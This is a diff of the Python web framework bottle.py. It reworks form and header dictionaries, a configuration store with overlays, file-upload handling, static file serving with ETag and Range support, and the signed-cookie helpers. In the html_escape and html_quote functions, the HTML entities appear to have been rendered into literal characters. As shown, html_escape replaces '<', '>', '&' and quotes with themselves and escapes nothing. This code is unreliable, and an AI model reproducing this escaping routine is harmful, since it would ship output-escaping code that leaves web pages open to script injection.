input_encoding = 'utf8' @@ -1777,16 +2227,17 @@ class FormsDict(MultiDict): recode_unicode = True def _fix(self, s, encoding=None): - if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI - s = s.encode('latin1') - if isinstance(s, bytes): # Python 2 WSGI + if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI + return s.encode('latin1').decode(encoding or self.input_encoding) + elif isinstance(s, bytes): # Python 2 WSGI return s.decode(encoding or self.input_encoding) - return s + else: + return s def decode(self, encoding=None): - ''' Returns a copy with all keys and values de- or recoded to match + """ Returns a copy with all keys and values de- or recoded to match :attr:`input_encoding`. Some libraries (e.g. WTForms) want a - unicode dictionary. ''' + unicode dictionary. """ copy = FormsDict() enc = copy.input_encoding = encoding or self.input_encoding copy.recode_unicode = False @@ -1795,6 +2246,7 @@ def decode(self, encoding=None): return copy def getunicode(self, name, default=None, encoding=None): + """ Return the value as a unicode string, or the default. """ try: return self._fix(self[name], encoding) except (UnicodeError, KeyError): @@ -1806,7 +2258,6 @@ def __getattr__(self, name, default=unicode()): return super(FormsDict, self).__getattr__(name) return self.getunicode(name, default=default) - class HeaderDict(MultiDict): """ A case-insensitive version of :class:`MultiDict` that defaults to replace the old value instead of appending it. """ @@ -1815,24 +2266,38 @@ def __init__(self, *a, **ka): self.dict = {} if a or ka: self.update(*a, **ka) - def __contains__(self, key): return _hkey(key) in self.dict - def __delitem__(self, key): del self.dict[_hkey(key)] - def __getitem__(self, key): return self.dict[_hkey(key)][-1] - def __setitem__(self, key, value): self.dict[_hkey(key)] = [str(value)] + def __contains__(self, key): + return _hkey(key) in self.dict + + def __delitem__(self, key): + del self.dict[_hkey(key)] + + def __getitem__(self, key): + return self.dict[_hkey(key)][-1] + + def __setitem__(self, key, value): + self.dict[_hkey(key)] = [_hval(value)] + def append(self, key, value): - self.dict.setdefault(_hkey(key), []).append(str(value)) - def replace(self, key, value): self.dict[_hkey(key)] = [str(value)] - def getall(self, key): return self.dict.get(_hkey(key)) or [] + self.dict.setdefault(_hkey(key), []).append(_hval(value)) + + def replace(self, key, value): + self.dict[_hkey(key)] = [_hval(value)] + + def getall(self, key): + return self.dict.get(_hkey(key)) or [] + def get(self, key, default=None, index=-1): return MultiDict.get(self, _hkey(key), default, index) + def filter(self, names): - for name in [_hkey(n) for n in names]: + for name in (_hkey(n) for n in names): if name in self.dict: del self.dict[name] class WSGIHeaderDict(DictMixin): - ''' This dict-like class wraps a WSGI environ dict and provides convenient + """ This dict-like class wraps a WSGI environ dict and provides convenient access to HTTP_* fields. Keys and values are native strings (2.x bytes or 3.x unicode) and keys are case-insensitive. If the WSGI environment contains non-native string values, these are de- or encoded @@ -1841,7 +2306,7 @@ class WSGIHeaderDict(DictMixin): The API will remain stable even on changes to the relevant PEPs. Currently PEP 333, 444 and 3333 are supported. (PEP 444 is the only one that uses non-native strings.) - ''' + """ #: List of keys that do not have a ``HTTP_`` prefix. 
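A short sketch of the attribute-style access that `FormsDict` layers on top of `MultiDict`, with invented field names; it assumes the patched `bottle` module is importable.

```python
from bottle import FormsDict

form = FormsDict()
form['username'] = 'admin'
form.append('username', 'root')     # MultiDict: multiple values per key

print(form.username)                # 'root'  (most recent value wins)
print(form.getall('username'))      # ['admin', 'root']
print(form.missing)                 # ''      (missing attributes default to '')
```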
cgikeys = ('CONTENT_TYPE', 'CONTENT_LENGTH') @@ -1849,18 +2314,24 @@ def __init__(self, environ): self.environ = environ def _ekey(self, key): - ''' Translate header field name to CGI/WSGI environ key. ''' - key = key.replace('-','_').upper() + """ Translate header field name to CGI/WSGI environ key. """ + key = key.replace('-', '_').upper() if key in self.cgikeys: return key return 'HTTP_' + key def raw(self, key, default=None): - ''' Return the header value as is (may be bytes or unicode). ''' + """ Return the header value as is (may be bytes or unicode). """ return self.environ.get(self._ekey(key), default) def __getitem__(self, key): - return tonat(self.environ[self._ekey(key)], 'latin1') + val = self.environ[self._ekey(key)] + if py3k: + if isinstance(val, unicode): + val = val.encode('latin1').decode('utf8') + else: + val = val.decode('utf8') + return val def __setitem__(self, key, value): raise TypeError("%s is read-only." % self.__class__) @@ -1871,54 +2342,268 @@ def __delitem__(self, key): def __iter__(self): for key in self.environ: if key[:5] == 'HTTP_': - yield key[5:].replace('_', '-').title() + yield _hkey(key[5:]) elif key in self.cgikeys: - yield key.replace('_', '-').title() + yield _hkey(key) + + def keys(self): + return [x for x in self] - def keys(self): return [x for x in self] - def __len__(self): return len(self.keys()) - def __contains__(self, key): return self._ekey(key) in self.environ + def __len__(self): + return len(self.keys()) + def __contains__(self, key): + return self._ekey(key) in self.environ + +_UNSET = object() class ConfigDict(dict): - ''' A dict-subclass with some extras: You can access keys like attributes. - Uppercase attributes create new ConfigDicts and act as name-spaces. - Other missing attributes return None. Calling a ConfigDict updates its - values and returns itself. - - >>> cfg = ConfigDict() - >>> cfg.Namespace.value = 5 - >>> cfg.OtherNamespace(a=1, b=2) - >>> cfg - {'Namespace': {'value': 5}, 'OtherNamespace': {'a': 1, 'b': 2}} - ''' + """ A dict-like configuration storage with additional support for + namespaces, validators, meta-data and overlays. - def __getattr__(self, key): - if key not in self and key[0].isupper(): - self[key] = ConfigDict() - return self.get(key) + This dict-like class is heavily optimized for read access. + Read-only methods and item access should be as fast as a native dict. + """ + + __slots__ = ('_meta', '_change_listener', '_overlays', '_virtual_keys', '_source', '__weakref__') + + def __init__(self): + self._meta = {} + self._change_listener = [] + #: Weak references of overlays that need to be kept in sync. + self._overlays = [] + #: Config that is the source for this overlay. + self._source = None + #: Keys of values copied from the source (values we do not own) + self._virtual_keys = set() + + def load_module(self, name, squash=True): + """Load values from a Python module. + + Import a python module by name and add all upper-case module-level + variables to this config dict. + + :param name: Module name to import and load. + :param squash: If true (default), nested dicts are assumed to + represent namespaces and flattened (see :meth:`load_dict`). + """ + config_obj = load(name) + obj = {key: getattr(config_obj, key) + for key in dir(config_obj) if key.isupper()} + + if squash: + self.load_dict(obj) + else: + self.update(obj) + return self + + def load_config(self, filename, **options): + """ Load values from ``*.ini`` style config files using configparser. + + INI style sections (e.g. 
``[section]``) are used as namespace for + all keys within that section. Both section and key names may contain + dots as namespace separators and are converted to lower-case. + + The special sections ``[bottle]`` and ``[ROOT]`` refer to the root + namespace and the ``[DEFAULT]`` section defines default values for all + other sections. - def __setattr__(self, key, value): - if hasattr(dict, key): - raise AttributeError('Read-only attribute.') - if key in self and self[key] and isinstance(self[key], ConfigDict): - raise AttributeError('Non-empty namespace attribute.') - self[key] = value + :param filename: The path of a config file, or a list of paths. + :param options: All keyword parameters are passed to the underlying + :class:`python:configparser.ConfigParser` constructor call. - def __delattr__(self, key): - if key in self: del self[key] + """ + options.setdefault('allow_no_value', True) + if py3k: + options.setdefault('interpolation', + configparser.ExtendedInterpolation()) + conf = configparser.ConfigParser(**options) + conf.read(filename) + for section in conf.sections(): + for key in conf.options(section): + value = conf.get(section, key) + if section not in ('bottle', 'ROOT'): + key = section + '.' + key + self[key.lower()] = value + return self + + def load_dict(self, source, namespace=''): + """ Load values from a dictionary structure. Nesting can be used to + represent namespaces. - def __call__(self, *a, **ka): - for key, value in dict(*a, **ka).items(): setattr(self, key, value) + >>> c = ConfigDict() + >>> c.load_dict({'some': {'namespace': {'key': 'value'} } }) + {'some.namespace.key': 'value'} + """ + for key, value in source.items(): + if isinstance(key, basestring): + nskey = (namespace + '.' + key).strip('.') + if isinstance(value, dict): + self.load_dict(value, namespace=nskey) + else: + self[nskey] = value + else: + raise TypeError('Key has type %r (not a string)' % type(key)) return self + def update(self, *a, **ka): + """ If the first parameter is a string, all keys are prefixed with this + namespace. Apart from that it works just as the usual dict.update(). + + >>> c = ConfigDict() + >>> c.update('some.namespace', key='value') + """ + prefix = '' + if a and isinstance(a[0], basestring): + prefix = a[0].strip('.') + '.' + a = a[1:] + for key, value in dict(*a, **ka).items(): + self[prefix + key] = value + + def setdefault(self, key, value=None): + if key not in self: + self[key] = value + return self[key] + + def __setitem__(self, key, value): + if not isinstance(key, basestring): + raise TypeError('Key has type %r (not a string)' % type(key)) + + self._virtual_keys.discard(key) + + value = self.meta_get(key, 'filter', lambda x: x)(value) + if key in self and self[key] is value: + return + + self._on_change(key, value) + dict.__setitem__(self, key, value) + + for overlay in self._iter_overlays(): + overlay._set_virtual(key, value) + + def __delitem__(self, key): + if key not in self: + raise KeyError(key) + if key in self._virtual_keys: + raise KeyError("Virtual keys cannot be deleted: %s" % key) + + if self._source and key in self._source: + # Not virtual, but present in source -> Restore virtual value + dict.__delitem__(self, key) + self._set_virtual(key, self._source[key]) + else: # not virtual, not present in source. This is OUR value + self._on_change(key, None) + dict.__delitem__(self, key) + for overlay in self._iter_overlays(): + overlay._delete_virtual(key) + + def _set_virtual(self, key, value): + """ Recursively set or update virtual keys. 
""" + if key in self and key not in self._virtual_keys: + return # Do nothing for non-virtual keys. + + self._virtual_keys.add(key) + if key in self and self[key] is not value: + self._on_change(key, value) + dict.__setitem__(self, key, value) + for overlay in self._iter_overlays(): + overlay._set_virtual(key, value) + + def _delete_virtual(self, key): + """ Recursively delete virtual entry. """ + if key not in self._virtual_keys: + return # Do nothing for non-virtual keys. + + if key in self: + self._on_change(key, None) + dict.__delitem__(self, key) + self._virtual_keys.discard(key) + for overlay in self._iter_overlays(): + overlay._delete_virtual(key) + + def _on_change(self, key, value): + for cb in self._change_listener: + if cb(self, key, value): + return True + + def _add_change_listener(self, func): + self._change_listener.append(func) + return func + + def meta_get(self, key, metafield, default=None): + """ Return the value of a meta field for a key. """ + return self._meta.get(key, {}).get(metafield, default) + + def meta_set(self, key, metafield, value): + """ Set the meta field for a key to a new value. + + Meta-fields are shared between all members of an overlay tree. + """ + self._meta.setdefault(key, {})[metafield] = value + + def meta_list(self, key): + """ Return an iterable of meta field names defined for a key. """ + return self._meta.get(key, {}).keys() + + def _define(self, key, default=_UNSET, help=_UNSET, validate=_UNSET): + """ (Unstable) Shortcut for plugins to define own config parameters. """ + if default is not _UNSET: + self.setdefault(key, default) + if help is not _UNSET: + self.meta_set(key, 'help', help) + if validate is not _UNSET: + self.meta_set(key, 'validate', validate) + + def _iter_overlays(self): + for ref in self._overlays: + overlay = ref() + if overlay is not None: + yield overlay + + def _make_overlay(self): + """ (Unstable) Create a new overlay that acts like a chained map: Values + missing in the overlay are copied from the source map. Both maps + share the same meta entries. + + Entries that were copied from the source are called 'virtual'. You + can not delete virtual keys, but overwrite them, which turns them + into non-virtual entries. Setting keys on an overlay never affects + its source, but may affect any number of child overlays. + + Other than collections.ChainMap or most other implementations, this + approach does not resolve missing keys on demand, but instead + actively copies all values from the source to the overlay and keeps + track of virtual and non-virtual keys internally. This removes any + lookup-overhead. Read-access is as fast as a build-in dict for both + virtual and non-virtual keys. + + Changes are propagated recursively and depth-first. A failing + on-change handler in an overlay stops the propagation of virtual + values and may result in an partly updated tree. Take extra care + here and make sure that on-change handlers never fail. + + Used by Route.config + """ + # Cleanup dead references + self._overlays[:] = [ref for ref in self._overlays if ref() is not None] + + overlay = ConfigDict() + overlay._meta = self._meta + overlay._source = self + self._overlays.append(weakref.ref(overlay)) + for key in self: + overlay._set_virtual(key, self[key]) + return overlay + + + class AppStack(list): """ A stack-like list. Calling it returns the head of the stack. """ def __call__(self): """ Return the current default application. 
""" - return self[-1] + return self.default def push(self, value=None): """ Add a new :class:`Bottle` instance to the stack """ @@ -1926,40 +2611,58 @@ def push(self, value=None): value = Bottle() self.append(value) return value + new_app = push + @property + def default(self): + try: + return self[-1] + except IndexError: + return self.push() -class WSGIFileWrapper(object): - def __init__(self, fp, buffer_size=1024*64): +class WSGIFileWrapper(object): + def __init__(self, fp, buffer_size=1024 * 64): self.fp, self.buffer_size = fp, buffer_size - for attr in ('fileno', 'close', 'read', 'readlines', 'tell', 'seek'): + for attr in 'fileno', 'close', 'read', 'readlines', 'tell', 'seek': if hasattr(fp, attr): setattr(self, attr, getattr(fp, attr)) def __iter__(self): buff, read = self.buffer_size, self.read - while True: - part = read(buff) - if not part: return + part = read(buff) + while part: yield part + part = read(buff) -class _iterchain(itertools.chain): - ''' This only exists to be able to attach a .close method to iterators that - do not support attribute assignment (most of itertools). ''' +class _closeiter(object): + """ This only exists to be able to attach a .close method to iterators that + do not support attribute assignment (most of itertools). """ + + def __init__(self, iterator, close=None): + self.iterator = iterator + self.close_callbacks = makelist(close) + + def __iter__(self): + return iter(self.iterator) + + def close(self): + for func in self.close_callbacks: + func() class ResourceManager(object): - ''' This class manages a list of search paths and helps to find and open + """ This class manages a list of search paths and helps to find and open application-bound resources (files). :param base: default value for :meth:`add_path` calls. :param opener: callable used to open resources. :param cachemode: controls which lookups are cached. One of 'all', 'found' or 'none'. - ''' + """ def __init__(self, base='./', opener=open, cachemode='all'): - self.opener = open + self.opener = opener self.base = base self.cachemode = cachemode @@ -1969,7 +2672,7 @@ def __init__(self, base='./', opener=open, cachemode='all'): self.cache = {} def add_path(self, path, base=None, index=None, create=False): - ''' Add a new path to the list of search paths. Return False if the + """ Add a new path to the list of search paths. Return False if the path does not exist. :param path: The new search path. Relative paths are turned into @@ -1984,7 +2687,7 @@ def add_path(self, path, base=None, index=None, create=False): along with a python module or package:: res.add_path('./resources/', __file__) - ''' + """ base = os.path.abspath(os.path.dirname(base or self.base)) path = os.path.abspath(os.path.join(base, os.path.dirname(path))) path += os.sep @@ -2000,7 +2703,7 @@ def add_path(self, path, base=None, index=None, create=False): return os.path.exists(path) def __iter__(self): - ''' Iterate over all existing files in all registered paths. ''' + """ Iterate over all existing files in all registered paths. """ search = self.path[:] while search: path = search.pop() @@ -2011,11 +2714,11 @@ def __iter__(self): else: yield full def lookup(self, name): - ''' Search for a resource and return an absolute file path, or `None`. + """ Search for a resource and return an absolute file path, or `None`. The :attr:`path` list is searched in order. The first match is - returend. Symlinks are followed. The result is cached to speed up - future lookups. ''' + returned. Symlinks are followed. 
The result is cached to speed up + future lookups. """ if name not in self.cache or DEBUG: for path in self.path: fpath = os.path.join(path, name) @@ -2028,22 +2731,84 @@ def lookup(self, name): return self.cache[name] def open(self, name, mode='r', *args, **kwargs): - ''' Find a resource and return a file object, or raise IOError. ''' + """ Find a resource and return a file object, or raise IOError. """ fname = self.lookup(name) if not fname: raise IOError("Resource %r not found." % name) - return self.opener(name, mode=mode, *args, **kwargs) + return self.opener(fname, mode=mode, *args, **kwargs) +class FileUpload(object): + def __init__(self, fileobj, name, filename, headers=None): + """ Wrapper for a single file uploaded via ``multipart/form-data``. """ + #: Open file(-like) object (BytesIO buffer or temporary file) + self.file = fileobj + #: Name of the upload form field + self.name = name + #: Raw filename as sent by the client (may contain unsafe characters) + self.raw_filename = filename + #: A :class:`HeaderDict` with additional headers (e.g. content-type) + self.headers = HeaderDict(headers) if headers else HeaderDict() + content_type = HeaderProperty('Content-Type') + content_length = HeaderProperty('Content-Length', reader=int, default=-1) + def get_header(self, name, default=None): + """ Return the value of a header within the multipart part. """ + return self.headers.get(name, default) + @cached_property + def filename(self): + """ Name of the file on the client file system, but normalized to ensure + file system compatibility. An empty filename is returned as 'empty'. + + Only ASCII letters, digits, dashes, underscores and dots are + allowed in the final filename. Accents are removed, if possible. + Whitespace is replaced by a single dash. Leading or tailing dots + or dashes are removed. The filename is limited to 255 characters. + """ + fname = self.raw_filename + if not isinstance(fname, unicode): + fname = fname.decode('utf8', 'ignore') + fname = normalize('NFKD', fname) + fname = fname.encode('ASCII', 'ignore').decode('ASCII') + fname = os.path.basename(fname.replace('\\', os.path.sep)) + fname = re.sub(r'[^a-zA-Z0-9-_.\s]', '', fname).strip() + fname = re.sub(r'[-\s]+', '-', fname).strip('.-') + return fname[:255] or 'empty' + + def _copy_file(self, fp, chunk_size=2 ** 16): + read, write, offset = self.file.read, fp.write, self.file.tell() + while 1: + buf = read(chunk_size) + if not buf: break + write(buf) + self.file.seek(offset) + + def save(self, destination, overwrite=False, chunk_size=2 ** 16): + """ Save file to disk or copy its content to an open file(-like) object. + If *destination* is a directory, :attr:`filename` is added to the + path. Existing files are not overwritten by default (IOError). + + :param destination: File path, directory or file(-like) object. + :param overwrite: If True, replace existing files. (default: False) + :param chunk_size: Bytes to read at a time. 
(default: 64kb) + """ + if isinstance(destination, basestring): # Except file-likes here + if os.path.isdir(destination): + destination = os.path.join(destination, self.filename) + if not overwrite and os.path.exists(destination): + raise IOError('File exists.') + with open(destination, 'wb') as fp: + self._copy_file(fp, chunk_size) + else: + self._copy_file(destination, chunk_size) ############################################################################### # Application Helper ########################################################### ############################################################################### -def abort(code=500, text='Unknown Error: Application stopped.'): +def abort(code=500, text='Unknown Error.'): """ Aborts execution and causes a HTTP error. """ raise HTTPError(code, text) @@ -2051,31 +2816,67 @@ def abort(code=500, text='Unknown Error: Application stopped.'): def redirect(url, code=None): """ Aborts execution and causes a 303 or 302 redirect, depending on the HTTP protocol version. """ - if code is None: + if not code: code = 303 if request.get('SERVER_PROTOCOL') == "HTTP/1.1" else 302 - location = urljoin(request.url, url) - raise HTTPResponse("", status=code, Location=location) + res = response.copy(cls=HTTPResponse) + res.status = code + res.body = "" + res.set_header('Location', urljoin(request.url, url)) + raise res -def _file_iter_range(fp, offset, bytes, maxread=1024*1024): - ''' Yield chunks from a range in a file. No chunk is bigger than maxread.''' +def _rangeiter(fp, offset, limit, bufsize=1024 * 1024): + """ Yield chunks from a range in a file. """ fp.seek(offset) - while bytes > 0: - part = fp.read(min(bytes, maxread)) - if not part: break - bytes -= len(part) + while limit > 0: + part = fp.read(min(limit, bufsize)) + if not part: + break + limit -= len(part) yield part -def static_file(filename, root, mimetype='auto', download=False): - """ Open a file in a safe way and return :exc:`HTTPResponse` with status - code 200, 305, 401 or 404. Set Content-Type, Content-Encoding, - Content-Length and Last-Modified header. Obey If-Modified-Since header - and HEAD requests. +def static_file(filename, root, + mimetype=True, + download=False, + charset='UTF-8', + etag=None, + headers=None): + """ Open a file in a safe way and return an instance of :exc:`HTTPResponse` + that can be sent back to the client. + + :param filename: Name or path of the file to send, relative to ``root``. + :param root: Root path for file lookups. Should be an absolute directory + path. + :param mimetype: Provide the content-type header (default: guess from + file extension) + :param download: If True, ask the browser to open a `Save as...` dialog + instead of opening the file with the associated program. You can + specify a custom filename as a string. If not specified, the + original filename is used (default: False). + :param charset: The charset for files with a ``text/*`` mime-type. + (default: UTF-8) + :param etag: Provide a pre-computed ETag header. If set to ``False``, + ETag handling is disabled. (default: auto-generate ETag header) + :param headers: Additional headers dict to add to the response. + + While checking user input is always a good idea, this function provides + additional protection against malicious ``filename`` parameters from + breaking out of the ``root`` directory and leaking sensitive information + to an attacker. + + Read-protected files or files outside of the ``root`` directory are + answered with ``403 Access Denied``. 
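A hypothetical example of the `FileUpload` helper defined above; the field name, filename and payload are invented, and the snippet assumes the patched `bottle` module is importable.

```python
import os
import tempfile
from io import BytesIO
from bottle import FileUpload

upload = FileUpload(BytesIO(b'id,name\n1,test\n'), 'datafile',
                    '../../etc/passwd  report.csv',
                    headers={'Content-Type': 'text/csv'})

print(upload.raw_filename)    # exactly what the client sent
print(upload.filename)        # sanitized: 'passwd-report.csv'
print(upload.content_type)    # 'text/csv'

target = tempfile.mkdtemp()
upload.save(target)           # stored as <target>/passwd-report.csv
print(os.listdir(target))
```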
Missing files result in a + ``404 Not Found`` response. Conditional requests (``If-Modified-Since``, + ``If-None-Match``) are answered with ``304 Not Modified`` whenever + possible. ``HEAD`` and ``Range`` requests (used by download managers to + check or continue partial downloads) are also handled automatically. """ - root = os.path.abspath(root) + os.sep + + root = os.path.join(os.path.abspath(root), '') filename = os.path.abspath(os.path.join(root, filename.strip('/\\'))) - headers = dict() + headers = headers.copy() if headers else {} + getenv = request.environ.get if not filename.startswith(root): return HTTPError(403, "Access denied.") @@ -2084,49 +2885,66 @@ def static_file(filename, root, mimetype='auto', download=False): if not os.access(filename, os.R_OK): return HTTPError(403, "You do not have permission to access this file.") - if mimetype == 'auto': - mimetype, encoding = mimetypes.guess_type(filename) - if mimetype: headers['Content-Type'] = mimetype - if encoding: headers['Content-Encoding'] = encoding - elif mimetype: + if mimetype is True: + name = download if isinstance(download, str) else filename + mimetype, encoding = mimetypes.guess_type(name) + if encoding == 'gzip': + mimetype = 'application/gzip' + elif encoding: # e.g. bzip2 -> application/x-bzip2 + mimetype = 'application/x-' + encoding + + if charset and mimetype and 'charset=' not in mimetype \ + and (mimetype[:5] == 'text/' or mimetype == 'application/javascript'): + mimetype += '; charset=%s' % charset + + if mimetype: headers['Content-Type'] = mimetype + if download is True: + download = os.path.basename(filename) + if download: - download = os.path.basename(filename if download == True else download) + download = download.replace('"','') headers['Content-Disposition'] = 'attachment; filename="%s"' % download stats = os.stat(filename) headers['Content-Length'] = clen = stats.st_size - lm = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime(stats.st_mtime)) - headers['Last-Modified'] = lm + headers['Last-Modified'] = email.utils.formatdate(stats.st_mtime, usegmt=True) + headers['Date'] = email.utils.formatdate(time.time(), usegmt=True) + + if etag is None: + etag = '%d:%d:%d:%d:%s' % (stats.st_dev, stats.st_ino, stats.st_mtime, + clen, filename) + etag = hashlib.sha1(tob(etag)).hexdigest() + + if etag: + headers['ETag'] = etag + check = getenv('HTTP_IF_NONE_MATCH') + if check and check == etag: + return HTTPResponse(status=304, **headers) - ims = request.environ.get('HTTP_IF_MODIFIED_SINCE') + ims = getenv('HTTP_IF_MODIFIED_SINCE') if ims: ims = parse_date(ims.split(";")[0].strip()) - if ims is not None and ims >= int(stats.st_mtime): - headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) - return HTTPResponse(status=304, **headers) + if ims is not None and ims >= int(stats.st_mtime): + return HTTPResponse(status=304, **headers) body = '' if request.method == 'HEAD' else open(filename, 'rb') headers["Accept-Ranges"] = "bytes" - ranges = request.environ.get('HTTP_RANGE') - if 'HTTP_RANGE' in request.environ: - ranges = list(parse_range_header(request.environ['HTTP_RANGE'], clen)) + range_header = getenv('HTTP_RANGE') + if range_header: + ranges = list(parse_range_header(range_header, clen)) if not ranges: return HTTPError(416, "Requested Range Not Satisfiable") offset, end = ranges[0] - headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end-1, clen) - headers["Content-Length"] = str(end-offset) - if body: body = _file_iter_range(body, offset, end-offset) + rlen = end - offset + 
headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end - 1, clen) + headers["Content-Length"] = str(rlen) + if body: body = _closeiter(_rangeiter(body, offset, rlen), body.close) return HTTPResponse(body, status=206, **headers) return HTTPResponse(body, **headers) - - - - - ############################################################################### # HTTP Utilities and MISC (TODO) ############################################### ############################################################################### @@ -2136,14 +2954,31 @@ def debug(mode=True): """ Change the debug level. There is only one debug level supported at the moment.""" global DEBUG + if mode: warnings.simplefilter('default') DEBUG = bool(mode) +def http_date(value): + if isinstance(value, basestring): + return value + if isinstance(value, datetime): + # aware datetime.datetime is converted to UTC time + # naive datetime.datetime is treated as UTC time + value = value.utctimetuple() + elif isinstance(value, datedate): + # datetime.date is naive, and is treated as UTC time + value = value.timetuple() + if not isinstance(value, (int, float)): + # convert struct_time in UTC to UNIX timestamp + value = calendar.timegm(value) + return email.utils.formatdate(value, usegmt=True) + + def parse_date(ims): """ Parse rfc1123, rfc850 and asctime timestamps and return UTC epoch. """ try: ts = email.utils.parsedate_tz(ims) - return time.mktime(ts[:8] + (0,)) - (ts[9] or 0) - time.timezone + return calendar.timegm(ts[:8] + (0, )) - (ts[9] or 0) except (TypeError, ValueError, IndexError, OverflowError): return None @@ -2153,32 +2988,70 @@ def parse_auth(header): try: method, data = header.split(None, 1) if method.lower() == 'basic': - user, pwd = touni(base64.b64decode(tob(data))).split(':',1) + user, pwd = touni(base64.b64decode(tob(data))).split(':', 1) return user, pwd except (KeyError, ValueError): return None + def parse_range_header(header, maxlen=0): - ''' Yield (start, end) ranges parsed from a HTTP Range header. Skip - unsatisfiable ranges. The end index is non-inclusive.''' + """ Yield (start, end) ranges parsed from a HTTP Range header. Skip + unsatisfiable ranges. The end index is non-inclusive.""" if not header or header[:6] != 'bytes=': return ranges = [r.split('-', 1) for r in header[6:].split(',') if '-' in r] for start, end in ranges: try: if not start: # bytes=-100 -> last 100 bytes - start, end = max(0, maxlen-int(end)), maxlen + start, end = max(0, maxlen - int(end)), maxlen elif not end: # bytes=100- -> all but the first 99 bytes start, end = int(start), maxlen - else: # bytes=100-200 -> bytes 100-200 (inclusive) - start, end = int(start), min(int(end)+1, maxlen) + else: # bytes=100-200 -> bytes 100-200 (inclusive) + start, end = int(start), min(int(end) + 1, maxlen) if 0 <= start < end <= maxlen: yield start, end except ValueError: pass + +#: Header tokenizer used by _parse_http_header() +_hsplit = re.compile('(?:(?:"((?:[^"\\\\]|\\\\.)*)")|([^;,=]+))([;,=]?)').findall + +def _parse_http_header(h): + """ Parses a typical multi-valued and parametrised HTTP header (e.g. Accept headers) and returns a list of values + and parameters. For non-standard or broken input, this implementation may return partial results. + :param h: A header string (e.g. ``text/html,text/plain;q=0.9,*/*;q=0.8``) + :return: List of (value, params) tuples. The second element is a (possibly empty) dict. 
+ """ + values = [] + if '"' not in h: # INFO: Fast path without regexp (~2x faster) + for value in h.split(','): + parts = value.split(';') + values.append((parts[0].strip(), {})) + for attr in parts[1:]: + name, value = attr.split('=', 1) + values[-1][1][name.strip().lower()] = value.strip() + else: + lop, key, attrs = ',', None, {} + for quoted, plain, tok in _hsplit(h): + value = plain.strip() if plain else quoted.replace('\\"', '"') + if lop == ',': + attrs = {} + values.append((value, attrs)) + elif lop == ';': + if tok == '=': + key = value + else: + attrs[value.strip().lower()] = '' + elif lop == '=' and key: + attrs[key.strip().lower()] = value + key = None + lop = tok + return values + + def _parse_qsl(qs): r = [] - for pair in qs.replace(';','&').split('&'): + for pair in qs.split('&'): if not pair: continue nv = pair.split('=', 1) if len(nv) != 2: nv.append('') @@ -2187,44 +3060,55 @@ def _parse_qsl(qs): r.append((key, value)) return r + def _lscmp(a, b): - ''' Compares two strings in a cryptographically safe way: - Runtime is not affected by length of common prefix. ''' - return not sum(0 if x==y else 1 for x, y in zip(a, b)) and len(a) == len(b) + """ Compares two strings in a cryptographically safe way: + Runtime is not affected by length of common prefix. """ + return not sum(0 if x == y else 1 + for x, y in zip(a, b)) and len(a) == len(b) -def cookie_encode(data, key): - ''' Encode and sign a pickle-able object. Return a (byte) string ''' +def cookie_encode(data, key, digestmod=None): + """ Encode and sign a pickle-able object. Return a (byte) string """ + depr(0, 13, "cookie_encode() will be removed soon.", + "Do not use this API directly.") + digestmod = digestmod or hashlib.sha256 msg = base64.b64encode(pickle.dumps(data, -1)) - sig = base64.b64encode(hmac.new(tob(key), msg).digest()) + sig = base64.b64encode(hmac.new(tob(key), msg, digestmod=digestmod).digest()) return tob('!') + sig + tob('?') + msg -def cookie_decode(data, key): - ''' Verify and decode an encoded string. Return an object or None.''' +def cookie_decode(data, key, digestmod=None): + """ Verify and decode an encoded string. Return an object or None.""" + depr(0, 13, "cookie_decode() will be removed soon.", + "Do not use this API directly.") data = tob(data) if cookie_is_encoded(data): sig, msg = data.split(tob('?'), 1) - if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg).digest())): + digestmod = digestmod or hashlib.sha256 + hashed = hmac.new(tob(key), msg, digestmod=digestmod).digest() + if _lscmp(sig[1:], base64.b64encode(hashed)): return pickle.loads(base64.b64decode(msg)) return None def cookie_is_encoded(data): - ''' Return True if the argument looks like a encoded cookie.''' + """ Return True if the argument looks like a encoded cookie.""" + depr(0, 13, "cookie_is_encoded() will be removed soon.", + "Do not use this API directly.") return bool(data.startswith(tob('!')) and tob('?') in data) def html_escape(string): - ''' Escape HTML special characters ``&<>`` and quotes ``'"``. ''' - return string.replace('&','&').replace('<','<').replace('>','>')\ - .replace('"','"').replace("'",''') + """ Escape HTML special characters ``&<>`` and quotes ``'"``. 
""" + return string.replace('&', '&').replace('<', '<').replace('>', '>')\ + .replace('"', '"').replace("'", ''') def html_quote(string): - ''' Escape and quote a string to be used as an HTTP attribute.''' - return '"%s"' % html_escape(string).replace('\n','%#10;')\ - .replace('\r',' ').replace('\t',' ') + """ Escape and quote a string to be used as an HTTP attribute.""" + return '"%s"' % html_escape(string).replace('\n', ' ')\ + .replace('\r', ' ').replace('\t', ' ') def yieldroutes(func): @@ -2233,40 +3117,39 @@ def yieldroutes(func): takes optional keyword arguments. The output is best described by example:: a() -> '/a' - b(x, y) -> '/b/:x/:y' - c(x, y=5) -> '/c/:x' and '/c/:x/:y' - d(x=5, y=6) -> '/d' and '/d/:x' and '/d/:x/:y' + b(x, y) -> '/b/<x>/<y>' + c(x, y=5) -> '/c/<x>' and '/c/<x>/<y>' + d(x=5, y=6) -> '/d' and '/d/<x>' and '/d/<x>/<y>' """ - import inspect # Expensive module. Only import if necessary. - path = '/' + func.__name__.replace('__','/').lstrip('/') - spec = inspect.getargspec(func) + path = '/' + func.__name__.replace('__', '/').lstrip('/') + spec = getargspec(func) argc = len(spec[0]) - len(spec[3] or []) - path += ('/:%s' * argc) % tuple(spec[0][:argc]) + path += ('/<%s>' * argc) % tuple(spec[0][:argc]) yield path for arg in spec[0][argc:]: - path += '/:%s' % arg + path += '/<%s>' % arg yield path def path_shift(script_name, path_info, shift=1): - ''' Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa. + """ Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa. :return: The modified paths. :param script_name: The SCRIPT_NAME path. :param script_name: The PATH_INFO path. :param shift: The number of path fragments to shift. May be negative to change the shift direction. (default: 1) - ''' + """ if shift == 0: return script_name, path_info pathlist = path_info.strip('/').split('/') scriptlist = script_name.strip('/').split('/') if pathlist and pathlist[0] == '': pathlist = [] if scriptlist and scriptlist[0] == '': 